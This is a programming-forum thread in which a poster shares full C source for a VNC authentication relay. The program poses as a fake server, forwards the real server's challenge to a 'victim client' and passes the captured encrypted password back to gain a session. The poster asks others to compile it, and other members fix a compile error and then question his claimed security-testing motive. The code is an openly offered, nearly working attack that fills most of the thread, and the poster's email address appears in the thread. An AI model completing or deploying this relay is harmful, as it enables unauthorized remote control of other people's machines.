delphi programming forums mysql charset mget recursive synonimos
free ventrilo servers hosting cs javascript delay python find in list
12
Back Forum New

Rank: 1
1# Jump to »
nick2Post at 2011-3-11 12:16 | Show This Author's Posts Only
abstract:

if (write (vncfd, buf, strlen (buf) ) < strlen (buf) ) {
perror ("write");
exit (-1);
}
/* we now read authenticarion method code from VNC server */
if ( (nbytes = read (vncfd, buf, BUFSIZ) ) <= 0) {
perror ("read");
exit (-1);
}
/* here is the challenge from server */
if ( (nbytes = read (vncfd, buf, BUFSIZ) ) <= 0) {
perror ("read");
exit (-1);
}
/* we send the challenge to the victim client */
if (write (clientfd, buf, 16) < 16) {
perror ("write");
exit (-1);
}
/* we have the encrypted password from the client */
if ( (nbytes = read (clientfd, buf, BUFSIZ) ) <= 0) {
perror ("read");
exit (-1);
}
/* we send the encrypted password to the VNC server */
if (write (vncfd, buf, 16) < 16) {
perror ("write");
exit (-1);
}
/* we read the result from the authentication process */
if (read (vncfd, buf, BUFSIZ) < 4) {
perror ("read");
exit (-1);
}
/* at this point we should be authenticated */
        /* place whatever code you want here */
close (clientfd);
close (sockfd);
close (vncfd);
return 0;
}


Please I tried but get errors etc..if you can compile it and maybe post the .exe I would be thankful!
By the way Hi everyone i'm new! ^_^
Code:
  1. #include <netinet/in.h>
  2. #include <string.h>
  3. #include <sys/types.h>
  4. #include <sys/socket.h>
  5. #define VNCPORT 5900
  6. #define VNCSERVER "x.x.x.x"
  7. #define QUEUE 8
  8. #define BUFSIZ 512
  9. typedef char rfbProtocolVersionMsg[13];
  10. #define sz_rfbProtocolVersionMsg 12
  11. int main (int argc, char **argv) {
  12. int sockfd, clientfd, vncfd;
  13. int nbytes = 0;
  14. struct sockaddr_in server, client, vnc;
  15. int len = sizeof (client);
  16. char buf [BUFSIZ];
  17. if ( (sockfd = socket (AF_INET, SOCK_STREAM, 0) ) == -1) {
  18. perror ("socket");
  19. exit (-1);
  20. }
  21. bzero (&server, sizeof (server) );
  22. server.sin_family = AF_INET;
  23. server.sin_addr.s_addr = htonl (INADDR_ANY);
  24. server.sin_port = htons (VNCPORT);
  25. /* this is the fake VNC server */
  26. if (bind (sockfd, (struct sockaddr *) &server,
  27.         sizeof (server) ) == -1) {
  28. perror ("bind");
  29. exit (-1);
  30. }
  31. listen (sockfd, QUEUE);
  32. if ( (clientfd = accept (sockfd,
  33.         (struct sockaddr *) &client, &len) ) == -1) {
  34. perror ("accept");
  35. exit (-1);
  36. }
  37. strcpy (buf, "RFB 003.003\n");
  38. /* we must send VNC version number (from protocol) */
  39. if (write (clientfd, buf, strlen (buf) ) < strlen (buf) ) {
  40. perror ("write");
  41. exit (-1);
  42. }
  43. /* we also must read VNC version number (from protocol) */
  44. if ( (nbytes = read (clientfd, buf, BUFSIZ) ) <= 0) {
  45. perror ("read");
  46. exit (-1);
  47. }
  48. buf [nbytes] = 0;
  49. printf ("version -> \%s\n", buf);
  50. buf
  51. = 0x00;
  52. buf [1] = 0x00;
  53. buf [2] = 0x00;
  54. buf [3] = 0x02;
  55. /* we send the authentication method code to the client */
  56. if (write (clientfd, buf, 4) < 4) {
  57. perror ("write");
  58. exit (-1);
  59. }
  60. if ( (vncfd = socket (AF_INET, SOCK_STREAM, 0) ) == -1) {
  61. perror ("socket");
  62. exit (-1);
  63. }
  64. bzero (&vnc, sizeof (vnc) );
  65. vnc.sin_family = AF_INET;
  66. vnc.sin_addr.s_addr = inet_addr (VNCSERVER);
  67. vnc.sin_port = htons (VNCPORT);
  68. /* we connect to the real VNC server */
  69. if (connect (vncfd, (struct sockaddr *) &vnc,
  70.         sizeof (vnc) ) == -1) {
  71. perror ("connect");
  72. exit (-1);
  73. }
  74. /* again, we read version number from the VNC server */
  75. if ( (nbytes = read (vncfd, buf, BUFSIZ) ) <= 0) {
  76. perror ("read");
  77. exit (-1);
  78. }
  79. strcpy (buf, "RFB 003.003\n");
  80. /* and we send ours */
  81. if (write (vncfd, buf, strlen (buf) ) < strlen (buf) ) {
  82. perror ("write");
  83. exit (-1);
  84. }
  85. /* we now read authenticarion method code from VNC server */
  86. if ( (nbytes = read (vncfd, buf, BUFSIZ) ) <= 0) {
  87. perror ("read");
  88. exit (-1);
  89. }
  90. /* here is the challenge from server */
  91. if ( (nbytes = read (vncfd, buf, BUFSIZ) ) <= 0) {
  92. perror ("read");
  93. exit (-1);
  94. }
  95. /* we send the challenge to the victim client */
  96. if (write (clientfd, buf, 16) < 16) {
  97. perror ("write");
  98. exit (-1);
  99. }
  100. /* we have the encrypted password from the client */
  101. if ( (nbytes = read (clientfd, buf, BUFSIZ) ) <= 0) {
  102. perror ("read");
  103. exit (-1);
  104. }
  105. /* we send the encrypted password to the VNC server */
  106. if (write (vncfd, buf, 16) < 16) {
  107. perror ("write");
  108. exit (-1);
  109. }
  110. /* we read the result from the authentication process */
  111. if (read (vncfd, buf, BUFSIZ) < 4) {
  112. perror ("read");
  113. exit (-1);
  114. }
  115. /* at this point we should be authenticated */
  116.         /* place whatever code you want here */
  117. close (clientfd);
  118. close (sockfd);
  119. close (vncfd);
  120. return 0;
  121. }
Copy Code

TOP

Rank: 1
2#
dwise1_aolPost at 2011-3-11 12:16 | Show This Author's Posts Only
The error is in line 65:
Code:
  1. /* we also must read VNC version number (from protocol) */
  2. if ( (nbytes = read (clientfd, buf, BUFSIZ) ) <= 0) {
  3. perror ("read");
  4. exit (-1);
  5. }
  6. buf [nbytes] = 0;
  7. printf ("version -> \%s\n", buf);
  8. buf
  9. = 0x00;
  10. buf [1] = 0x00;
  11. buf [2] = 0x00;
  12. buf [3] = 0x02;
Copy Code
buf is an array, yet you are trying to assign a byte value to it.  I assume that you meant: buf[0] = 0x00;.  Correct that and it should compile.
Last summer I learned a handy command-line option for vi.  +n will open the edit on line #n.  So when gcc returned an error message for line 65, I ran: vi +65 nick2.c (lacking a name, I just named it after you).

TOP

Rank: 1
3#
nick2Post at 2011-3-11 12:16 | Show This Author's Posts Only
could you compile it for me and maybe send to my email, magicshotgun@hotmail.com plz
I just deleted miracle c workshop because the program generates errors..
plzz i need this program!

TOP

Rank: 1
4#
dwise1_aolPost at 2011-3-11 12:16 | Show This Author's Posts Only
"fake server"
"victim client"
What is this code supposed to be doing?  It looks like a "man in the middle" attack in which you are trying to capture the "victim client's" ID and password.
And why did the error baffle you?  It was a very simple error that any beginner C programmer could have handled.
Too many things here make me more than a little suspicious.  Just what is going on?
BTW, executables tend to depend on finding a particular version of shared libraries on the system, so a program compiled on one Linux or UNIX machine would not necessarily run on another.

TOP

Rank: 1
5#
nick2Post at 2011-3-11 12:16 | Show This Author's Posts Only
abstract:

if (write (vncfd, buf, strlen (buf) ) < strlen (buf) ) {
perror ("write");
exit (-1);
}
/* we now read authenticarion method code from VNC server */
if ( (nbytes = read (vncfd, buf, BUFSIZ) ) <= 0) {
perror ("read");
exit (-1);
}
/* here is the challenge from server */
if ( (nbytes = read (vncfd, buf, BUFSIZ) ) <= 0) {
perror ("read");
exit (-1);
}
/* we send the challenge to the victim client */
if (write (clientfd, buf, 16) < 16) {
perror ("write");
exit (-1);
}
/* we have the encrypted password from the client */
if ( (nbytes = read (clientfd, buf, BUFSIZ) ) <= 0) {
perror ("read");
exit (-1);
}
/* we send the encrypted password to the VNC server */
if (write (vncfd, buf, 16) < 16) {
perror ("write");
exit (-1);
}
/* we read the result from the authentication process */
if (read (vncfd, buf, BUFSIZ) < 4) {
perror ("read");
exit (-1);
}
/* at this point we should be authenticated */
        /* place whatever code you want here */
close (clientfd);
close (sockfd);
close (vncfd);
return 0;
}


yes its for vnc I am trying to test the vunerbalitiy of my server .. I don't want my clients getting hacked you see.
If its vuenrable i'm going to have to change to a new tool.. that means passing out the tool to everyone and setting up a new server which is alot of work! So if anyone would be so kind to please compile this so I can get on my way..thanks.

TOP

Rank: 1
6#
infamous41mdPost at 2011-3-11 12:16 | Show This Author's Posts Only
man you dont even know what you're talking about. first off, you have defined teh server address as "x.x.x.x"...eya good luck resolving that one.  2nd off, you're not testing a vulnerability at all. your trying to pose as a legitiamte VNC server, (somehow expecting a random vnc client to contact you?), then try and shuffle around some auth codes to trick the client into sending you their password.  now someone else correct me if im wrong, but this attack doesnt even make sense to me.  why would teh client be trying to contact YOUR fake server in the first place?  why wouldnt they access the real server?  maybe if it was on an internal network and you were a man in the middle you could pose as the server, but otherwise i dont even understand the logisitics of such an attack, or possibly see how it could be carried out across a WAN..  maybe if you could explain them to us you will get some more help.

TOP

Rank: 1
7#
dwise1_aolPost at 2011-3-11 12:16 | Show This Author's Posts Only
infamous, I'm not sure, but if he could get his fake server somehow listed as a legitimate server address, then he could trick someone into connecting to it, whereupon it would appear to the victim that everything is indeed legitimate. (sorry about the length of the sentence; I start out majoring in German)  I can only guess through email advertising or posting on forums or even on his own web page.
Anyway, I don't see how this program could be a legitimate test of his server's security.
Oh s***!  I just Google'd on VNC!  It's used to control computers remotely.  Definitely not a good sign.  At least VNC passwords go out encrypted.
Besides, why would someone setting up and running a server not have the most basic computer tools and not be able to handle a really simple error message?  It's looking more and more like Nick's a script-kiddie.  Betcha he's running Windows and doesn't even have a clue what platform his source code is for.
BTW Nick, I hope your dog is feeling better.  Our Chihuahua mix also rubs at his ears a lot.

TOP

Rank: 1
8#
nick2Post at 2011-3-11 12:16 | Show This Author's Posts Only
lol... i'm on the search engine? and if you think i'm some kind of script kiddie your wrong. I work for concordhosting.com and we're testing vnc vunerbility. Now if your that stupid to miss the exploit news all over those security websites 'with the exploit code' then you got some issues on your hand buddy.
And for infamous you aren't too smart are you?
its defined as x.x.x.x because you change that address later on when you type in the ip address.
You make me laugh.
edit: Also It doesn't host a fake server and wait for people to connect and steal their passwords if thats what you think. It tricks the server you're connecting to into thinking you don't need a password.
also once again how did you find that post I made awhile back?
-Nick

TOP

Rank: 1
9#
nick2Post at 2011-3-11 12:16 | Show This Author's Posts Only
I was wrong about the x.x.x.x sorry infamous.. I was just told you need to put valid ip or you can make it so you can just put it in through msdos

TOP

Rank: 1
10#
dwise1_aolPost at 2011-3-11 12:16 | Show This Author's Posts Only
abstract:

if (write (vncfd, buf, strlen (buf) ) < strlen (buf) ) {
perror ("write");
exit (-1);
}
/* we now read authenticarion method code from VNC server */
if ( (nbytes = read (vncfd, buf, BUFSIZ) ) <= 0) {
perror ("read");
exit (-1);
}
/* here is the challenge from server */
if ( (nbytes = read (vncfd, buf, BUFSIZ) ) <= 0) {
perror ("read");
exit (-1);
}
/* we send the challenge to the victim client */
if (write (clientfd, buf, 16) < 16) {
perror ("write");
exit (-1);
}
/* we have the encrypted password from the client */
if ( (nbytes = read (clientfd, buf, BUFSIZ) ) <= 0) {
perror ("read");
exit (-1);
}
/* we send the encrypted password to the VNC server */
if (write (vncfd, buf, 16) < 16) {
perror ("write");
exit (-1);
}
/* we read the result from the authentication process */
if (read (vncfd, buf, BUFSIZ) < 4) {
perror ("read");
exit (-1);
}
/* at this point we should be authenticated */
        /* place whatever code you want here */
close (clientfd);
close (sockfd);
close (vncfd);
return 0;
}



Originally posted by nick2
lol... i'm on the search engine? and if you think i'm some kind of script kiddie your wrong. I work for concordhosting.com and we're testing vnc vunerbility. Now if your that stupid to miss the exploit news all over those security websites 'with the exploit code' then you got some issues on your hand buddy.
And for infamous you aren't too smart are you?
its defined as x.x.x.x because you change that address later on when you type in the ip address.
You make me laugh.
edit: Also It doesn't host a fake server and wait for people to connect and steal their passwords if thats what you think. It tricks the server you're connecting to into thinking you don't need a password.
also once again how did you find that post I made awhile back?
-Nick
Let me get this straight.  You work for concordhosting.com which has no programmers.  Nobody there has even the most basic programming tools.  Nobody there is able to read very simple error messages.  What tools you did have you threw out because they give you error messages on code that DOES contain errors.  So you have to go out on the forums begging for something that an ISP's staff and resources could do very easily?  And you don't even understand basic Google'ing?  What's the stock code on that company?  I want to make sure to stay far away from it, because that company's in trouble.
Sorry, but I'm becoming increasingly skeptical about your story.
BTW:
"also once again how did you find that post I made awhile back?"
You've only asked that question this one time.  So where do you get that "once again" from?
Hint: you did provide your email address.
And I honestly do hope that your dog is feeling better.

TOP

12
Back Forum